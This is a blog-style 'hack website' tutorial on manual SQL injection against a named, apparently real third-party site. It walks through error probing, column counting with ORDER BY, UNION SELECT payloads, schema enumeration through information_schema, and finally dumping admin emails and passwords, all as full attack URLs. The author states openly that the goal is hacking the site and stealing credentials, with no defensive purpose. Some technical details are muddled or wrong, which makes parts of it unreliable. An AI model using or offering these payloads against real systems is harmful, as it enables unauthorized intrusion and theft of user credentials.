Breaking News
Loading...

How to hack website manual ( Full Guide )

09:31

Hello PrOleEtS once again T00L kiT here, today i gonna start Sqli Injection, today is First class so lets start

Requirements :-

Firefox Browser


Vulnerability Site  

Ok i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
  Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

Step 2
=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)



and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  ( Error)

its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT



Step 4
=> Now enter table number value and click ok 


Step 5
=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working 


Its working we can't got any error :D 

step 6
=> Put - in the end link values like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-


you can see this when we put - we go got Columns number is 6

Step 7
=> Now we need version :-
replace 6 number this query "version()"


you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()
For Database = database()
For use = use()
For Host = host@@

Step 8
=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-


you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9
=> now replace "database()" with User


Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like 



And replace table with columns like this
For columns 
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
 now click Execute  


Step 10
Now we need admin Email id and password now use this query 

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-


You can see this we got all admin emails and passwords ;) :D 

i hope you like this Tutorial 

Thanks for visiting
  








0 comments:

Post a Comment

 
Toggle Footer